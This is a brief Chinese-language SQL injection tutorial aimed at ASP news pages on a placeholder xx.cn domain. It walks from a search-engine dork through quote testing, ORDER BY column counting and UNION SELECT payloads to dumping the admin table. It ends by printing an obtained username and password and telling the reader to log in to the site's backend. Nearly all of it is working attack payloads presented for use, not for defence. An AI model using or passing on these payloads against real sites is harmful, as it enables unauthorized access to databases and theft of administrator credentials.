site:xx.cn  inurl:asp?id= //找文章

xx.cn/pth/onews.asp?id=243' //试注入

xx.cn/pth/onews.asp?id=243 order by 10

xx.cn/pth/onews.asp?id=243 order by 20 //order by 语句用于根据指定的列(字段)对结果集进行排序,这里是在爆字段长度

爆出字段长度为11

联合查询

xx.cn/pth/onews.asp?id=243 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 from admin

或者

xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from admin

爆出2&&3，用字段(admin表中的admin字段与password字段)替换掉2&&3

xx.cn/pth/onews.asp?id=243 and 1=2 union select 1,admin,password,4,5,6,7,8,9,10,11 from admin

爆出账号与密码：

账号：admin

密码：bfpms

找到后台：xx.cn

登陆即可